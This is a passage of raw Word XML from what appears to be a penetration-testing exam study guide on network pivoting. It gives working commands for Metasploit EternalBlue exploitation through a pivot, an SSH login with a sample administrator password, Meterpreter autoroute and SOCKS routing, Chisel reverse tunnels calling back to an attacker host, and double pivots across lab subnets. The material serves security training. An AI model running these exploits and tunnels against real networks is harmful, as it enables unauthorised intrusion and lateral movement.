      <w:r w:rsidRPr="00F17F75">
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15065D01" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Worked use — MS17-010 over a forward:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> forward the pivot's SMB ports to an internal Win2008, then aim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pivot</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AA6BD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># on PIVOT:  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>datapipe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.0.0.0 445 172.16.20.20 445</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>and 135)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B5D0D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393DA4FF" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFAC6C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set RHOSTS 10.10.10.10        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># pivot relays to 172.16.20.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B66048" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>LHOST  10.10.14.2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C989B13" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>check ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7581F779" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="5261767F">
          <v:rect id="_x0000_i1194" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FFD96A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 xml:space="preserve">7. Meterpreter Pivoting (autoroute, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, SOCKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344861C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get a Meterpreter session on the PIVOT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>, then route the framework through it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9A867" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E5528" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>use exploit/multi/ssh/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>sshexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># example: creds-based foothold on the pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B59BEC" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>10.10.14.2 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B9602" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set username </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>administrator ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set password 'Passw0rd!'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626AC70" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1F2C5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>get_local_subnets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># discover the internal subnet(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB3E3F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session routing (autoroute):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F9FB8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:lastRenderedPageBreak/>
        <w:t>run post/multi/manage/autoroute           # auto-add routes for the session's subnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF55D2" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>run autoroute -s 172.16.20.0/24           # or explicit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C3C6B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>run autoroute -p                          # print routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226BAA0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2593B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>equivalently</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>:  route add 172.16.20.0 255.255.255.0 &lt;session-id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5DC64" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOCKS for non-MSF tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4A566" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>use auxiliary/server/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>socks_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set VERSION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>5 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set SRVPORT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>1080 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9EEF5" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -&gt; socks5 127.0.0.1 1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0E9A0" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single-port forward:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> add -l 3389 -p 3389 -r 172.16.20.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit internally through the route:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFF5095" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C32A1E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>set RHOSTS 172.16.20.20        # reachable via autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833670A" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>LHOST  172.16.20.10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">        # pivot's INTERNAL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> -&gt; callback stays in-segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3704AF91" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>check ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D02BB6" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST over a pivot:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> set it to the pivot's </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>internal</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> interface (or use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> payload / a remote-forwarded port) so the internal target can reach the handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5229BD62" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="000BCD51">
          <v:rect id="_x0000_i1195" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26533165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>8. Chisel (Local, Remote, SOCKS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609AAC88" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Chisel tunnels over HTTP(S) — ideal when SSH isn't available. One binary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9CA21" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local mode (server on the compromised pivot):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C1CF8" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># PIVOT:    chisel server -p 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25602CCA" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># ATTACKER: chisel client 10.10.10.10:443 4445:172.16.20.20:445     # 127.0.0.1:4445 -&gt; target:445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2FAED" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"># SOCKS:    PIVOT: chisel server -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>12345 ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ATTACKER: chisel client 10.10.10.10:12345 socks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881431F" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote/reverse mode (server on YOUR box — best through NAT/egress):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8BAD3" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># ATTACKER: chisel server -p 443 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E242432" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># PIVOT:    chisel client 10.10.14.2:443 R:445:172.16.20.20:445     # attacker 127.0.0.1:445 -&gt; target:445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D4916" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># PIVOT:    chisel client 10.10.14.2:443 R:8080:172.16.20.20:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639B04E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t># reverse SOCKS: ATTACKER: chisel server -p 12345 --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reverse ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PIVOT: chisel client 10.10.14.2:12345 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E2D559D" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Pair reverse SOCKS with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> exactly like §5/§7. Chisel's </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> is often the most reliable "whole-network" pivot on the exam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A2121" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:pict w14:anchorId="5FD05478">
          <v:rect id="_x0000_i1196" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15D890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>9. Double Pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21E39B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">Reach a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tier-3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> segment (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.30.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve">) visible only from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>172.16.20.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> host — chain the tunnel again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71257C3C" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Meterpreter (cleanest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BFC36" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># session 1 on PIVOT-1, autoroute 172.16.20.0/24 (as §7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA78B8B" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t># exploit PIVOT-2 (172.16.20.20) through that route -&gt; session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A12ADD" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t>run autoroute -s 172.16.30.0/24           # via session 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F6322E" w14:textId="77777777" w:rsidR="00F17F75" w:rsidRPr="00F17F75" w:rsidRDefault="00F17F75" w:rsidP="00F17F75">
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"># refresh SOCKS -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17F75">
        <w:t xml:space="preserve"> now reaches 172.16.30.0/24</w:t>
      </w:r>
    </w:p>
